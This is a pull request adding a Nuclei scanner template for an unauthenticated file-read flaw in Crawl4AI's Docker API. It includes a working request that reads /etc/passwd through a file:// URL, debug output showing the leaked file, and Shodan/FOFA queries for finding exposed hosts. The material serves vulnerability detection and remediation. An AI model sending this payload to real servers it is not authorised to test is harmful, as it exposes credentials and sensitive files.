### PR TITLE
Create CVE-2026-26217.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-26217.yaml
+++ b/http/cves/2026/CVE-2026-26217.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-26217
+
+info:
+  name: Crawl4AI < 0.8.0 - Local File Inclusion
+  author: Aryu-RU
+  severity: high
+  description: |
+    Crawl4AI before 0.8.0 does not restrict the URL scheme accepted by its Docker API crawl endpoints (/execute_js, /html, /screenshot, /pdf). An unauthenticated attacker can supply a file:// URL to make the server-side headless browser read arbitrary local files and return their contents in the crawl response, leading to disclosure of sensitive files such as /etc/passwd.
+  impact: |
+    Unauthenticated attackers can read arbitrary files from the server filesystem, exposing credentials, configuration, and other sensitive data.
+  remediation: |
+    Upgrade to Crawl4AI 0.8.0 or later, which validates the URL scheme and rejects file:// requests.
+  reference:
+    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26217
+    - https://github.com/unclecode/crawl4ai
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-26217
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: unclecode
+    product: crawl4ai
+    shodan-query: http.title:"Crawl4AI Playground"
+    fofa-query: title="Crawl4AI Playground"
+  tags: cve,cve2026,crawl4ai,lfi,unclecode,ai
+
+http:
+  - raw:
+      - |
+        POST /execute_js HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"url":"file:///etc/passwd","scripts":["document.body.innerText"]}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: body
+        words:
+          - '"redirected_url":"file:///etc/passwd"'
+          - '"success":true'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

Added **CVE-2026-26217** — Crawl4AI `< 0.8.0` unauthenticated Local File Inclusion via the `file://` URL scheme in the Docker API crawl endpoints.

Crawl4AI's Docker server crawl endpoints (`/execute_js`, `/html`, `/screenshot`, `/pdf`) do not validate the URL scheme before handing it to the server-side headless browser. An unauthenticated request supplying `"url": "file:///etc/passwd"` makes the server read and return arbitrary local files in the crawl response, leaking sensitive files. Fixed in 0.8.0, which rejects non-`http(s)` schemes.

- References:
  - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796
  - https://nvd.nist.gov/vuln/detail/CVE-2026-26217
  - https://github.com/unclecode/crawl4ai
- Classification: CVE-2026-26217 | CWE-22 (Path Traversal) | CVSS:3.1 7.5 — `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Vulnerable lab (official image, pre-0.8.0):

```
docker run -d --shm-size=1g -p 11235:11235 unclecode/crawl4ai:0.7.4
```

nuclei run against the vulnerable instance (request dumped + match):

```
$ nuclei -t http/cves/2026/CVE-2026-26217.yaml -u http://127.0.0.1:11235 -debug-req

POST /execute_js HTTP/1.1
Host: 127.0.0.1:11235
Content-Type: application/json

{"url":"file:///etc/passwd","scripts":["document.body.innerText"]}

[CVE-2026-26217] [http] [high] http://127.0.0.1:11235/execute_js
[INF] Scan completed. 1 matches found.
```

Response confirming arbitrary file read (trimmed):

```
"success": true,
"redirected_url": "file:///etc/passwd",
"status_code": 200,
"html": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."
```

Negative test — patched image (no false positive):

```
docker run -d --shm-size=1g -p 11236:11235 unclecode/crawl4ai:0.8.0
```

The patched server rejects the `file://` scheme with `{"detail":"URL must start with http://, https://"}` and nuclei reports **0 matches**. The template was also run against the project honeypot (`http://honey.scanme.sh`) with **0 matches**.

The matcher requires four independent signals (`condition: and`) to avoid false positives: the `/etc/passwd` content regex (`root:.*:0:0:`), the Crawl4AI-specific response fields (`"redirected_url":"file:///etc/passwd"` and `"success":true`), `application/json` content type, and HTTP 200.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
